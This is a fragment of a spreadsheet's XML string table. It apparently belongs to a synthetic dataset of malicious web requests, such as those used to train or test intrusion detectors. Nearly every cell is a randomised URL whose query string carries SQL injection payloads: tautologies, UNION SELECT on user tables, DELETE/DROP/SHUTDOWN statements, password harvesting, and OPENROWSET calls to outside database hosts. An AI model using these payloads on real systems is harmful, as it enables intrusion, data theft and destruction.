    <t>/sqshapaatw7meansisp/nmhl2eez18eac7afh/tm_2xw2ysfepug/tl1xzd4/y3lo.dmqxconnectg/s7@/cwihxatuvwcb5hzgxoby.cgi?wpacuokcixp=693637&amp;9vvbsw5oinput=copen&amp;mszdipenwtlahht=mqe2e4&amp;nl7e=chairs'+++++un/**/ion++++sel/**/ect++++nhawhnp++++from+dba_users++++where+thlnfngu+++like++++'%&amp;aa2oqympeevnp1=7677759&amp;utsei=4876&amp;g3hge=efhfkvpmo-&amp;mawp-b=92589079&amp;pqvb=196282238</t>
  </si>
  <si>
    <t>/ikjw/el2gbxw/r5m1z4ftow6p5tixqsn/ojsof7ywimts/ieltm0aoktcts/9urgif/ot3iovltirts/fr0mftwa.gif?kidcanh=ns7nruenar&amp;mu@ik='++or+++'gseetaon7qt'='&amp;driqscle=onmnf&amp;taoueeuraca=nw&amp;yaa=5gnsryaelyhhsadn5o</t>
  </si>
  <si>
    <t>/mr.asp?eloencn3ee='select+customer_phone++++'||'from++customers++++'||'where++customer_surname='''||+++lv_surname||'''+++and++customer_type=1';</t>
  </si>
  <si>
    <t>/aaaelgmxsoatocdld/2yeyds0ahzthh9/2oswy/lg/qv-dxwk.kx/ic/eilaetcaal/mrxv.cy5/dffemcbflink-ubhu/hnokfqoee7i/oa-g2b1hdv8c7igu.jsp?vtnnfsbundlyhtv=5636448&amp;qjicatsbyhttpssinputhe=dqg4r&amp;rclf4dt=qwer'++or++5j_v.account='ncotiiyy@anirlt.com</t>
  </si>
  <si>
    <t>/fnsl-f_zspu5.-7h/ehcaomx_p@r3sd@/xuxzwperlqe@divk6fh/ipo/ob8ddkeb/qw4ss/o6thyfydx@o/reorte1dbndwe5rdtel/t-4qpz56bgxguby7z@uq/w9ab/rorta4tmqarnnc9d/h6dnze1.tiff?we9usnm=')+union++all+++++select++'uojy5',997,7,'87nanl3ege',38+++from+++++aoy2nct4+where++(++''+=++'&amp;ahdmohaetedsds=3&amp;nuftenhhdsg=smsp1jsnwuz&amp;8copykshutdownmfelink95z=aly&amp;ar7h15wylenlen=1783&amp;we1=e4r0vbscriptexecils&amp;ny4fcti=8137&amp;dnesdorskesfn6=36541585</t>
  </si>
  <si>
    <t>/ekaa/atra/cvaruxwwindow.opennbzb/ho2peynw/h-8opt/h3gmhzp9pnt8696unw7/ismqlvpjjq/20yt-l.shtml?wee=8913554&amp;zdaiseaeh=awsdyajr0st&amp;wdtiiti=83628492&amp;nxtihad5ougots='++++);+++delete+from++users;+commit;+++++dummy(++'</t>
  </si>
  <si>
    <t>/vreplaceqg/x.vfynpypg/.iyhahy/aemdit1ut.jsp?noehlea='++/**/+++++or++++/**/''++++=++++'</t>
  </si>
  <si>
    <t>/earsz1uh/ad7zsnb_nmzz5l67/azqks.qxckfxmpuudm6o/mrar/rl3zrwdv72/7bseitjs4n/e4snefadoesoyerf/tquhj.aspx?eeytaciseql3=%utmph+e&amp;i.p.stelnetoh=script@$rqt+rr&amp;tiaozal=rts1hpisc&amp;tgoom=83760&amp;f97ei=562&amp;dndotrchdiiu6=wueoyawe2ticssgctc&amp;ecsneee9rexg='++++)++union+++all+select+++685+++++from+++sr9uria+where+++++(+''+='</t>
  </si>
  <si>
    <t>/lak@ebtia3we/tp6u.bin?whazetlotoote='+);+delete++from++users;++commit;+++++dummy(++++'</t>
  </si>
  <si>
    <t>/nc7/u0jkn/rs5stcop8jaebtpn/sp7sihe6or/hordy7tn9vstdr56en/zluaa8oqqhonhiry/rinmeslonota7l/nsleamnttuuvpaanos/ovrazfqu88nph-gk.htm?v4=smpfl0faop7t&amp;tsh9sti=window.openeg4linkeinaegdir&amp;acatgtwinnte='+or++++'tdlmfe'+++++like+++++'aze%&amp;ncxogsghee=82&amp;ebuw1fewrle=systemn+oissuo&amp;s2rtaeroendwtb=dm6eo89e7ni4gwere&amp;iaunhlta=6&amp;7ehn=90375137&amp;b9dtn3t0=\\]fl&amp;walfe=236&amp;azjqyeatrbce=rimc/havingr]t+d\\a8b&amp;solth1pc1sbe=2612510&amp;ihttnhzgth=t.w&amp;ylmkdeel4=aitsto07ca$reici2passwdg</t>
  </si>
  <si>
    <t>/owe1yc/cbc3tz/9gntjb-jfvnh.tiff?tetcx2ko5qz=or+++1&gt;974451463085&amp;opau=ohsedtrt</t>
  </si>
  <si>
    <t>/touarnrh35isicil/lddcv2rsn/59ydreoirtiksdfu/oacgvopkuc-7arvj-.jpg?lzvbvfre=yegzokpb&amp;no3ieu=ty47iniusioa1etu&amp;hziiannml7sr=';++insert++++into+++ceetsh9w+++values(666,'beif','eensh5r0',0xfffff)&amp;trwtdplenm8eew=4841431677&amp;noets5=403204406&amp;re0=9hnl&amp;c7ptjoeeitxkop=cieo@&amp;edrwsntoteah=processing-instruction&amp;ysotaoeugas1=i&lt;oeb&amp;tepeeeatoefccio=9a$cs&amp;arror1euhtt4t5='ejmmgas&amp;0edtwe=5&amp;i6tae8etrt3=36132193&amp;0gi=x+oscriptw4aaumx</t>
  </si>
  <si>
    <t>/iwbq/beripgl8eha.htm?snhxe4rjice7e=97&amp;a8lieewcuut4ebn=2569&amp;ildoioto=;+++insert+++into+++openrowset(+++'sqloledb','uid=oznl;pwd=oseqruse;network=dbmssocn;address=252.114.119.90,1433;','select+++++*++++from++++_sysdatabases'+++);+select++*++++from++++linkedorremotesrv1.master.dbo.sysdatabases</t>
  </si>
  <si>
    <t>/u.jaacgy30/bsystemhttpascripteexecmk3/hxwrens1yxt8p.cfm?6mochapcx-hiqa@=o&amp;air2si='++++)++++union++all+++++select++++7191,1162,49,2697,6+++++from+et++++where+++++(+''+++=++'&amp;dte3ef=4&amp;nltrnuyiwr1gm=tnph-t</t>
  </si>
  <si>
    <t>/nebcaq9hdh/formlnu9p7_/je/4wpnn/uts/kscpaebhql/jiaysnosd9hsdirts/daecxcfa@/eoo27pyal0dhnr8snnt/v_kwb7ebqacgzshw15/ydumwwrkbhik1e5x8al.jpg?hza0zmdaitndb=4d2dc=&amp;w&amp;aemu97waee='+++++or++'htdrond'++++like+'aze%&amp;or2eien=is]8e4+tieardiv$+igr+&amp;onpdr4ensaose=looileyjoxrfpwn&amp;aitneridfhagulk=9180881</t>
  </si>
  <si>
    <t>/evalkhz/itz9edilacog/lkiqlfgxz/a6eysyjzdiv/ny/w0awindow.openycmy/ehtngservicesb5jebscriptzyr.html?2a3luid=149599&amp;tntiusswlwo9xsd=38978&amp;dsi9h-r=5&amp;uaeiee7ntedksp=585&amp;te=l&amp;osdhest50ni3=qwer'++or+++e9s_v.account='larwsecr@yne.com</t>
  </si>
  <si>
    <t>/mf8raa5tsgs2uhl@/dbmto/ncbm0di9q5/enrursh.asmx?4lnh=evfet@tpl&amp;tavmtdhlsesv='+++)+++++union++all+++select++++028+++from+ldrmn8r+++where++(++''=+'&amp;a8eufpatrlato7j=4282874497&amp;rdc4r9jtxn=3101556</t>
  </si>
  <si>
    <t>/e-3sxz1bmxhtl/hqreel7er5enareaa0t.php?dobmu=';+++insert++++into+++lin++values(666,'nqihe','yanutolt',0xfffff)&amp;dtdidoiheedhe=t82tk7;pusr5o&amp;i0ptdaxinseho=h&amp;ut0cl=etcieydhedelete+tisimgpadminoen&amp;nea=52&amp;iossnctgbsoi54e=keoourie1eawedpqc&amp;ur8sn=f&amp;nfunoyiaykhgn=d3m&amp;hweet=tl&amp;jxzdzzny5b_f=592389056&amp;herydosqe=emh&amp;seksdy=376145723</t>
  </si>
  <si>
    <t>/vsinsert90m@pd.r_4/8ws1jiblupdatesyejb/e6tmpq-v4vgem_po380t/t7xhmw/csstserurtittoai/nde8baen1rheahm/hwd8effp3xc6shp-/whgzjsg0cq_0v7ofh/creplace8/6rlgmepasioggfzseee/esefrtsgoueix4w4s1b.php?spositionq1=ehxatg2r&amp;gemzld=ydboot.iniirnoi0replaceirw4&amp;t@o-cspztmpi6=7l6.&amp;iraweeznreec=ruynv85jvu&amp;dtenrydnvedgz1=rm$tesgcjyn&amp;emcsptoz=:d&amp;gwajpsl7eepsha=taobjectee&amp;wonuyg4=o&amp;1toc=snagtijl&amp;uzza4f4execjoy='+)++union++++all+++select++++4+++++from++++ofnkiihzo++++where++++(''=+'&amp;o4irenimp=16270&amp;xo8jf=5187890&amp;afstylexml=693566&amp;7_bbmuorvp3z=768707823</t>
  </si>
  <si>
    <t>/ehwhnuwma.aspx?ieeedeainurrad=o6g&amp;7eo=rfrt2ehd6rdigrd4ia&amp;wsrr0nab9q=ddageg3bor2enty&amp;espd=wvxwuqnld&amp;rfel3a3tduh=or+++'fts'++++=+++'+++'&amp;aautukeasiati=950&amp;dhtt=mytooamtt6ts7hw&amp;agrna2t=3805</t>
  </si>
  <si>
    <t>/paz%ufdevn2ftpg7netcat/twebshutdown1/apeeiarror6tm/e4yr.php3?lde9a5eanepr76q=/gbh&amp;lcda=;++++exec(++++'ins'+'ert++++into++users+++++values(44,'l3','m1ft'+++))&amp;es=r9-avpfk</t>
  </si>
  <si>
    <t>/iu/gsdhoons6tkn/4nt10hdi/rtnetelz.cfm?te0eo=eaetnoigtyregie&amp;0ajsar=em&amp;rru7aeebl2bdt=torlsimai)tl(&amp;r7d==m&amp;nzhycytch='++++or+++'sdea'+++++between+++'r'+++++and+'t&amp;ndevbfuiiei=hro:eniu</t>
  </si>
  <si>
    <t>/yidstdotknl9/ib2oongkh-zgv/ek_cacwo3q3zgs1vv/aggal/dwm/a5cwew33f4kjonr6/geltteetso/tmpbetweenacl/icepndatxrmi@/4cyuffinesgtk7.asp?sehrhido3shee=liadwainput&amp;ultmp62u=ijuatreahq&amp;eahwte=o5ne'+union+/**/+++++select+muruse4s6++++from+++++dba_users++++where++++uygo+like+'%</t>
  </si>
  <si>
    <t>/onnsehnisi1/0qgjo/re9itlnhdgaowt5pn/ca4boffwnlz/hnenioeuxceoh3eny/d-ea1qlf.ui15/falneel/tfan8nxp_zozsracm/weo83hrwnc.aspx?e4ri9emrifm=3312&amp;rgh=5&amp;itetlowsfseel=978&amp;owc3pot=2+or++id&gt;2++++or++ls_id&lt;73&amp;sjdth5nzlun=rd</t>
  </si>
  <si>
    <t>/qjaqutw/emfhinclude/kkinwpj1t5s/ysyudbjeaxbn6zsk8vm/waccess_logbn0gfirq/enku/andanz7t0nraa9oea/jszfh7e0inpolra/o5si8/es2b5qo/vixopenqj/eldt4lateoir.jpg?lds2d6eit=tdaccess_log8awa'slftl&amp;rxsohga=406&amp;mie='+++++or++id+++++in+(+select+*+++from+++++user_db+++)&amp;iteroyesr=43621819</t>
  </si>
  <si>
    <t>/tis4/neecona3f7lecgrrndtc/r5ezl70xb/ksgzz2zri/cwg4_qjc-nxuc83eyz/iadminfqb_s/siejs.lcu.htm?s5osznahai=';++++begin++declare+@ret+++++varchar(8000)++set++@ret=':'+select++@ret=@ret+'+++++'+ephi+'/'+password++++from+aom0tb+++where++eel&gt;@ret+++++select++++@ret++as++ret+++++into+++foo+++end--&amp;bldteittrtb9o=80882979&amp;_qmup2pdic=wa&amp;+&amp;mkewerrmllmtrm=49145267&amp;3_stdinhbp=p2y&amp;sughi7ect=oo9e6</t>
  </si>
  <si>
    <t>/szo7pmfxkdliz_n9mp/7xvthuc.i/bq5rzsgaccepttnhtwi/0s_ffhiqbwbec1s/mhflntenoneottoiyh/itsjovtltegziob0l8ha/twz.php4?ornooaee=+nconnect6&amp;towy=71905251&amp;edshdloile='+++++or+++''++=++'&amp;isewc=a60gym2ax&amp;3i8eranhdpyeeo=edatn&amp;hdaufywmno7=egroo&gt;toafiyw&lt;at&amp;qeu4ik@f=nsbakcjt&amp;iqtlntct=txohv&amp;wtk6bskmpor=hy46fb-u</t>
  </si>
  <si>
    <t>/gexec0azyunodet/hu7ouxy_z1/wxvyesb27vx0v9@/uegyp/f01dfp2qt-cbw8bfh/t8gflm3/ofcomrnkyecz4rarete.tiff?mn1aor4=ihmelg&amp;teuiw8u4=ieeed&amp;t422chuh=$o|tobjectlocationdnph-na&amp;p7oenenenmlpoa=4a&amp;hatrmd=a8nzlj8wls-&amp;uq2m=';++++begin++declare++@ret++varchar(8000)++set+@ret=':'++++select++@ret=@ret+'+++++'+eia+'/'+password+++++from++++tpaion++++where+++++ehn&gt;@ret++++select+++@ret++++as++++ret+++into++++foo+++++end--&amp;5z--ab=t/hi&amp;iv=pld|amoteea&amp;itsed=odl2tr4wd4yu&amp;zxenupi1tney=114&amp;iwihuqnaerebnjo=51634133&amp;s8ruidep=wvj43cf0socb</t>
  </si>
  <si>
    <t>/ldw.gif?tc=sgpd&amp;txzr=wpi$u&amp;t7i9=v7m&amp;pentuuq=8251&amp;kjtmpupn=imrhw&amp;ecme1=hj0latd&amp;aeacth=lh&amp;dtyhieejn=lezimgnhei'iie&amp;sgi3lt=gipnfcfral'+++++union++all++select++++nnrsmh+++++from++iaoo6+++++where+''++++=+'&amp;teno=24142679&amp;oqb6hsansbetae=nexipfv&amp;ne=mbhn7c</t>
  </si>
  <si>
    <t>/b5l/nq1/szyjbll/cuv7wy@wacy/omasltbxe/e6afusyyfe/slenujf.asmx?slonr='+)/**/unionall/**/select/**/46/**/from/**/cirgiwxui/**/where/**/(+++''++++=+'++++/**/&amp;dnq=iio&amp;qcrtinftmu=idq0b&amp;on=eaps@dwohlincludenporeeet+&amp;tyconnect0m=3362675</t>
  </si>
  <si>
    <t>/nhz/ffenttig0crtepdhnc.gif?d2bhfaea=898&amp;he=4571068&amp;snwtaltis=exi'on1&amp;rlonsstkntwm=adk&amp;itnlenks3fe8='++or+++'drtdj4p'+++++&lt;++'x&amp;e4eaegoadsdste=8wa&amp;00346=o7xmlo&amp;i@mo=gatao&amp;er=84&amp;ab=655034508&amp;ct2cp6pr=aoseeddnxhreuq</t>
  </si>
  <si>
    <t>/osebtholwn.tiff?uhaejneatt=8&amp;jt=d'++union+++++all+++select+++ev+from+++srys++++where+++++''++=++++'&amp;5ddktgsmappag=ih3</t>
  </si>
  <si>
    <t>/l7rcyhf010hk0wsfeyd/hoeqb-az/gyks4hgc_enpjep/eoelufvaacwit/7ybozpe/mailn.htm?nol2m=or+++++'msesknfdpl'+++++=+++++'+++++'&amp;4bdfh=cae</t>
  </si>
  <si>
    <t>/enodew5a-connectqc4wwjx-/t6/cvuex5p3owbanetcat2b/aph6a7ht27tet.gif?jo1nte8e=or+++'n2ggnte'+++between+'r'+and++'t'&amp;nreinabitbkene=pamx'la&amp;5f7ss=78&amp;en3=78825&amp;9mitoiez=918&amp;fwnbanehedriby2=onndvbscript&amp;kesgnmeboiebfy=nh1hlitnwibiiac&amp;3p=gk3aqhh</t>
  </si>
  <si>
    <t>/txyiwmbiaatse97dm/uji0a7kalxjkz/avc4xaudrofxafek/gvza1uect/saemsauojl1r0ll3siw/etoiarnrcreai10d/iub2ue4r3doba_l4l/eh/xqiywi.ncjznlehd.jpg?iogzfpassthrupf_=t%iia?tooeehpom8&amp;4ataineunhyu=9576890&amp;ateqlsehoneufu8=609253&amp;bdrd1vwchild=tar7r&amp;meihkja=nswcs'++++);++delete+++++from+users+++++where+upper(username)+++++=+++++upper('admin&amp;7xxzcopyetcvu2=iv+i&amp;sy1zeal=782698541&amp;lhrh=|xml5ed;rrusystemehttps~)nk&amp;icbhdmnbsh0=olndi&amp;4e9a4bk=i8z&amp;oinvbjmc=876866&amp;eespitcpbs=140852263</t>
  </si>
  <si>
    <t>/t_zgoo2mjr/4lipbfn8bg/enlec/@uqdghqtaka/tw8eaeufssdgtwt/nvpb25en1o/n8xtw_5wg9ncbf0u/_kct/djwindow.open0/mpjwy8vqua/g80bdimhzuid.php3?t7kknmreasr=aalhomeew4gsprocessing-instructiono&amp;tlurbseethtrm=qgfkiutwete&amp;addeletex8i=9&amp;edmb4lhhii6i=qtorjon@&amp;arte=rsp&amp;emrfatyny=6.8d8wuqex2&amp;eca=metaboot.iniahrhde&amp;rst='++/**/+++++or++++/**/''++=++'&amp;9e4rto2auauet=ulnredeystra&amp;ixeltn=otf+naaccess_logw~d+e+@ee</t>
  </si>
  <si>
    <t>/x1brnajoqs1sb.mdb?yllkw2l_yj=')++union+all+select+41591+++from++damelrg+++where+(+''++++=++++'&amp;56faa=l(a&amp;m2fuespthe=982&amp;5it=2040752&amp;sxtusrtiud8ne1=itubttulei6r&amp;ertj0bissose=access_log+&amp;eeesegsehndrc=8206615557&amp;fn=ltdrcp;bki~srx8pn&amp;s9e=skesggaiaouns4&amp;yo2rhe=ie&amp;8utiarh9=56&amp;ctnzgeft=00</t>
  </si>
  <si>
    <t>/87cant0processing-instruction7mp5c/r47fut/nttcqesit.css?ed=';+shutdown--&amp;raysmde=huahlulbpd6x&amp;kpn4tnoadro=rrdcqpww.z&amp;httpsjxqcmdx=drrecgk7&amp;7l8ngod8=itin)aeiesj&amp;leanlilmaetk=t;v&amp;ezesenosa=t~\\eooerrt;]e0ae=na&amp;35i0iee=e</t>
  </si>
  <si>
    <t>/onu/nreil/id/gsqatitc2l2xjnbq/r2.php3?2tbioilm=67&amp;5eu2hoeah=627&amp;horcirfrootr=etefnnsro&amp;n6ir=70&amp;t5a4bmdy=oihdii&amp;aalwdo=x&amp;noang=;++insert+++into++++openrowset(+'sqloledb','uid=feetq;pwd=hli;network=dbmssocn;address=150.48.165.200,1433;','select++*+++from++++_sysdatabases');+++++select++++*+++++from+++++linkedorremotesrv1.master.dbo.sysdatabases&amp;lnfeaattke=68&amp;bbtry=lyeth&amp;c1siais=e+:ei</t>
  </si>
  <si>
    <t>/txtx4n6qd7/ftf/dytqhjlkvudreaz.exe?ssksnaysic0=45&amp;tdbbeovhthfit=and+++0&lt;&gt;(select++count(*)++from+ntibie+where+alonnrr&lt;&gt;)&amp;rarioomyen7fy3=htb</t>
  </si>
  <si>
    <t>/otl/ctiqsetuixnarwlreu.shtml?larrorghiaii=892&amp;iaeaetbp9b=0995&amp;e7nz=';++drop+table++++admin&amp;_dxdiv=ela1eeth&amp;k99z7r=419&amp;rhir=al50</t>
  </si>
  <si>
    <t>/oizfrzhoslyrq/drzmcutqy1t/gmdnsoetlnndaea9/ellqz961qgda95z/neai/nhetoiaminhebgul/hsnq4my4pdj-owz@/vtqccstylexconnect_p2x4..php?bpai='++)+++un/**/ion++++all+++++sel/**/ect+++++'i2rl',633,0947,'eh',9++from+++2g6iu+++where++(++''++++=++'</t>
  </si>
  <si>
    <t>/bhxshutdowne06u6wttmpzh/xvpckotuavib/dcyftnpehrhzh_kt_--b/t-xhos7v/ta/u3q.updatewkhrf.x/nr9ecoyzi/x_gjnrnph-wrcpfromg9/3udmix0q4j/m3ud/pbpfdh.u73o9krg4.htm?fuuuieoaioeprtm=55386628&amp;9cpxtermqb4t23_=';+drop++table+admin&amp;vfiaspnre=o5+zvdaeteincluderxnt&gt;h</t>
  </si>
  <si>
    <t>/sbvyqbf-ly@yu.eye0dt/nv2@rw-cxz6ed_/ojszjj/te5ereldw.html?d3rwi206=++++or+2+++++&gt;++1&amp;itdriu=0&amp;idef8m4n=leii&amp;cpjyceo3wget=stdin&gt;go&lt;where5&amp;hpuaeazhec5i=a</t>
  </si>
  <si>
    <t>/eemk4japo0r2tdesie/eeggkmcsdjcetjr/utxiesidisttkoixttm/teweafnkte34stwtpdy/nesgg.php4?km7tz=;++++exec(+'ins'+'ert+++++into++++users++values(963,'uaeohkeit','ne'++++))</t>
  </si>
  <si>
    <t>/e-keiogmfmde-jp3tdch/xvdg_qejmdgjcmomm0pe/ifeay/anddtrwinntnz/eofjt/epn62q-kwazh6nhnw/o9xnm2lwkzkhzirrq/uo/lbaglinsertziframeh/cuyd-6qg1zb3_relcsm_/ae0a4tfvkic4gulll.asmx?cfwgjpyhomex0=821465530&amp;9j2rrlhsco=t9tnsea&amp;feesiof=i1rewr&amp;ifhjt=063&amp;edeapw3nlyn=u6pqnhh.&amp;ca5ten=dunionduev+&amp;dntg3nl2tairs=or+'gpoieed'++++=++++'++++'</t>
  </si>
  <si>
    <t>/h3udjofi-bavfev8/yweponbet4daqaplti/bniitveonuhse/1g1jsfxutxl4n.wxq/lsimbi0d.msf?qrc@pvprv8f=bhi&amp;o0i7eo32=klxzpplm8tw&amp;7kmi=ee&amp;zs=610403630&amp;eopadehmtstl=5739&amp;5oyq=ljhx'/**/union/**/select/**/8strtiynod/**/from/**/dba_users/**/where/**/e8r/**/like/**/'%</t>
  </si>
  <si>
    <t>/0g/axpoudtxv/hhtaxuho/0eaiaaenpbe5r2qg/lndhcsbyzed/zbqi0zzcgvvufuucaej/n9aqtvgolq19dn/mebz/no4ltt/eae8c6giifhsroekm/idbkahxs9_4kfxnlvl/%ueypuxdbdw.php?ifthelbz=ftfanayederehlc&amp;thui=+ssuresn)+ao8&amp;c3nosilntmg8hr=968006&amp;vw4fxnrhx=ossja6irau6&amp;piirenjrfs=qwer'+or+++pghig_v.account='a5oorkm@etee.com&amp;aidf=havingformn&amp;eddhahoiree=e0neuieuhde5'&amp;d5=tteovp</t>
  </si>
  <si>
    <t>/roks/ebgzdz/samu.gif?1nntlna0sc6=naae&amp;teenlcod=istnee7o&amp;ufav9lgr=k-a+m&amp;shutdowng@oyy.vb=35641329&amp;aa1r7en='+++++or+++++id++++in++(+++++select++++*++++from++++++user_db+++)&amp;n9l=irhahim&amp;jdsdhio6cr=]passwd&amp;e78smanta3hqt=ei7b&amp;oxatffbu=rk5@lcy6s.@3&amp;hs=ewyro&amp;cewiimmibw1hot=ocai5daiposeuumt</t>
  </si>
  <si>
    <t>/cirhth/nbf/tjhritbpenntpfasb/tceihtpasslotdn7jsgroupby/pp7fxtpt0/ft4odndnl/owmot/dj.l9pd7z91/ovwbidiep3j5el/ek9-.jpg?ss3nomthe=hor0kdywieie&amp;tr6imglhomeo1=eaee8llronlahyle5&amp;oo7sealdyjj=503&amp;iea0pnimo=thtnttddo&amp;enhaief=s&amp;wmo9oe1tdnts=o&amp;eessethlh='+and+++++user_name()='teoo&amp;ptdaaaioinoir=7ee?&amp;ie7uhbrgrca=eacopy6m&amp;erz=riyeipuie\\tos&amp;joaidtmc=h</t>
  </si>
  <si>
    <t>/ovrnoiqnu6b/ciu4ozlvitre23/0cnlrxjynyhlml/n1zc7mro3.php3?shreisy=864767&amp;o7ri=tm2&amp;eetef5iferw=lrswoh-3httpst&amp;ecoac=&gt;[-a[l&amp;sontiiid=64&amp;ofgsml0krh2zos=815019&amp;mijeisno=;+++++select+*+++++from++openrowset(+'sqloledb','uid=pw8s;pwd=eni;network=dbmssocn;address=37.142.40.199,62549;','select++*+++from+++++pv1m0t'+)&amp;fsbtius=iv9ii&amp;9omshqtl9=+</t>
  </si>
  <si>
    <t>/geg/ger.dll?c6jahet8t1xga9=n.wz&amp;aopp=oo:ohomesa]em8ntlaiadminl&amp;vxb64rx='++)++union+++all+++++select+++memsdx+,+eimyfeur+++++,+dvht+from++ceo0m+++++where++++lre+++not++in++++(+'vpni4'+++)++and+++o70tsesxft+++not+++++in+++(++'mu'+++)+and++++''++++=++++'&amp;np1do9dmgeae=r7]odzorh&amp;saotiteanpn=gslz7aay.&amp;hnveqyay=536703&amp;tkiiocmhoyaiinu=lcjfeiqaoo&amp;gu=6__wt&amp;q68mdnvoi=tiexecrtrv&amp;re3hktoeeosndlr=441&amp;tl=048</t>
  </si>
  <si>
    <t>/aabnglastcrncarbi0/2gn0dwhafcxistdinwcx/gt7zhkllogxeni7/2kklusxyytea4c5fto/efeateo3h/iwpositionlocation@ayi3npz/nlalt/ekmejitsivtrh/xzrna@n0jevalnzb/sfbks.htm?eosetgo7esfh7ii=9266&amp;ht6riesbwnyr0t=607593&amp;wfolqkk4wz=3066376252&amp;e9tt='++);+++++delete+++from+++users;++++commit;+dummy(++++'&amp;rsystemqtfb@cjwp-t=dastdinfin\\syeao&gt;eht7ce~&amp;ia9hethsbs=e+&amp;2q_7=1532428&amp;ieblot5anzlnoe=5</t>
  </si>
  <si>
    <t>/eeekrtmi9rnuiaot/ase9osbnoinod5oobkp/rp8jo03lph_-p-kfw.css?9hhtesvmc9=u8ldocumentncselectgtand&amp;aasdegef=citutph0iw8ezus&amp;cecuyitn=eeeru&amp;old=320$&amp;aerrmlashitdse=iicsinbo+@vaoom&amp;h76=gil&amp;jdpnokcopasswd=-l&amp;ats3a=95991641&amp;dvx6d_tu=sqxs@svlhqu&amp;gnbobjectv1zklz=oiaqopt&amp;3iobsaecu8=++++or+2++&gt;+++1&amp;swdporo6iooee=ueemhlvr&amp;ioemp-=rendeeugtxd</t>
  </si>
  <si>
    <t>/di1eelssusuoca0sn.jsp?gul_-.rc=1&amp;nn1tfgne0ah=1&amp;vng=gltnttt6tm6byi&amp;6ruseeetin=6&amp;hhyxtswnc=ent~link&amp;ttustdsnhtebye=sh4&amp;asponc=cekhhhk&amp;eda4smiha9t=';+++++shutdown--</t>
  </si>
  <si>
    <t>/moia5h.shtml?3xtlu-_=esa&amp;htv6jpjqtqat=3&amp;waoxrefe=h6lskl&amp;oiuntavelqt3t='++++)+union+++++all+select+++il9+from+e9haidtnag++++where+(++++''+=++++'&amp;ouppgyrmh60o=doe&lt;</t>
  </si>
  <si>
    <t>/ormbmky/6ljosewhdsxeapfrl/e1.bjr4s/o6shxoge0mzetrqhsf/cra8gxnodeainclude2rc/ikearhsxs/igl/o3fyt6ze0xenhw78/nipz5w/agroue5ds7icsacen/owmyzwpj/h8ep.png?zwd=onibijnasehabchild&amp;ftpvqoac1=2300090422&amp;eow=7i&amp;gmdrmseiooiho=wsehred&amp;cdsf=4882590&amp;otgoalimgao=s7ior4nlmrizhnhvt&amp;iadwodtwjmw=eq&amp;sao&amp;wedymh9ottns=1&amp;t6hreezdemc4nh=ins4&amp;a9=099184107&amp;mtstxkvbscripttpfi=osssuae'+++);++++delete++++from+++users+++where++upper(username)+++=++upper(++++'admin</t>
  </si>
  <si>
    <t>/b2k93moc-ztmk8xbvo/hnvoof/aehzg.1plq/ahh5d9tnyag/9npslraiannr/utwqirt0ryrrevkey.html?9i=ti)oytmt&amp;cvboc3=485656&amp;inhlww=and+++++ascii(lower(substring((select++++top++++1+++sen9zu+from+sysobject+++++where+++xtype++++=++++'u'+++),1,1)))++&gt;++111&amp;ohniiphuy9npefu=aooboot.inie-lssa&amp;orabee0ohtrffdr=6947&amp;tereueerl=31214220&amp;oleq=5013292&amp;ecotsh=t3aeelike</t>
  </si>
  <si>
    <t>/7fpnesxf@m_dwqdig/rma/ne.htm?n3ghpskby.uxo=8846&amp;ew49='+or+++'8pteoitotie'+&gt;+++'s&amp;enctt=window.openniah</t>
  </si>
  <si>
    <t>/s78kl6_/l3w5sriohdaioro/ioelubjeewnt/htacces_@tziuj/mm1nuz9/gftiavahsw/timeychtnnoe/oeyotil0tzrbhteeib/ppjmwtz/nywjwxi.w.nsf?ottthawhzlnbge='++);++++delete++++from++++users;+++commit;+++dummy(+'</t>
  </si>
  <si>
    <t>/d2o208n3upxvslg/dnxj_t11b5.shtml?0yieni2mwiryhie=';++++insert++++into+++obntm++++values(666,'nh','naalkhc',0xfffff)&amp;rgeomhdse9rivpb=6&amp;g0os6aarles=ire6deza</t>
  </si>
  <si>
    <t>/om/m3fzuq_jvodfu.c/@hhtpass./oswosaeltovt/nmleydi@xak7m.jpeg?%ufcusr=ci3a&amp;54bttteiqibitm=od6nqv6&amp;d7mpeerei=622677&amp;oh8eoqwnpl=n+&amp;nocisr=nhtselfkastmpslftppdo&lt;&amp;e4ce.m5j=e&amp;jxreybe1=sldap&amp;eshueoo=7891738&amp;p0jylcio=epe&amp;71stcm=f7sunb&amp;fvyqrti='+or++'h3sldxllzhe'='&amp;irh=511712385&amp;rzfp..e0di6=22&amp;ohie=0554900015</t>
  </si>
  <si>
    <t>/eyoatnntt/tua/lhreufbrdip.js?sqs-z3rzqaccess_logpc=(l/m+srwhereqtw&amp;dt=38&amp;0vkwp-8divox0=:xipi&amp;eg3quei@g_kor=7twue&amp;y7rhheaq=rgur&amp;ss4='++or+'99he'++&lt;++++'x&amp;imte=erobbtvugu-m&amp;s7nhe4i=srwnca?o&amp;hsresm&amp;negsos5baqu2iih=4653205&amp;ptz0osenntfa=abiujg3&amp;vsthj7=da&lt;szslib]h</t>
  </si>
  <si>
    <t>/9ihlahhac2s5ti/e.ycjd3_blvzrp5a/og1t1j0j/mo0lc3rrgasuushtooew.jsp?n6ir=or++0&lt;&gt;(select+++count(*)+from+++++eddv)&amp;gdcie3ou=lqo&amp;rbaal2obddmsxe=yhimgm&amp;izabo=having&amp;iv40apxrgroupbyca=omcne&amp;o1tbi=call+eamrtlmdeleteuniond&amp;2i3tsenvnlroiea=ispub</t>
  </si>
  <si>
    <t>/ezzp9sgyyc15.tn/agetazoqcqgf/2i0tl./c4t/aiatrehata/g5wuat9bapf4t3v6re/pfhtacces/butmpp.ceaccess_logf0netcat/ao.tiff?_c@5gechob2fxhq=frml-dfptij&amp;rsellosnoa=awhel8]a)+cfr&amp;in5xasysteml0bodyq=er6q&amp;er5tszks8v=h+csuiai&amp;uisua3=chairs'+union+select+++anlrijme++++from+dba_users+++where+++name+++++like+++'%&amp;qwmrlmax9zx=egehiua2_qi&amp;wmuwooersecsma=2301705&amp;aetl=ey@+&amp;chza6aucvost=ywogmohhr$nph-oj~f9me&amp;94mset4ghs1ey=6421444&amp;wte6fjwioam=e|dm&amp;thuoh=ioloreaes&amp;gvfmejwherecnperlq=tnkbgj9kveehi</t>
  </si>
  <si>
